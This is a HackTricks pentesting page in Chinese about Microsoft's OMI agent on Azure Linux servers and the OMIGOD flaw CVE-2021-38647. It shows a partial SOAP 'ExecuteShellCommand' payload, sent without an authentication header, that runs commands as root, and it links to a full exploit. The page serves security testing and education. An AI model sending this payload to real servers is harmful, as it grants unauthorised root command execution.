hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md
2023-08-03 19:12:22 +00:00

5.1 KiB
Raw Blame History

5985,5986 - OMI渗透测试

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本信息

OMI是由Microsoft开发的开源远程配置管理工具。当使用以下服务时通常会在Azure Linux服务器上安装OMI代理

  • Azure自动化
  • Azure自动更新
  • Azure运营管理套件
  • Azure日志分析
  • Azure配置管理
  • Azure诊断

当配置了这些服务时omiengine进程将在所有接口上监听并以root用户身份运行。

**默认端口:**5985http5986https

CVE-2021-38647

截至9月16日Azure中新创建的Linux服务器仍然使用一个存在漏洞的OMI代理版本。在部署Linux服务器并启用上述服务之后服务器将处于易受攻击的状态。

OMI服务器通过/wsman端点接收配置管理消息。通常会传递一个身份验证头和消息OMI服务器将确保客户端被授权进行通信。在这种情况下漏洞是当没有身份验证头时服务器错误地接受消息并以root用户身份执行指令。

通过向服务器发送一个没有指定身份验证头的“ExecuteShellCommand”SOAP负载它将以root身份执行该命令。

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

https://github.com/horizon3ai/CVE-2021-38647中找到完整的漏洞利用。

参考资料

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥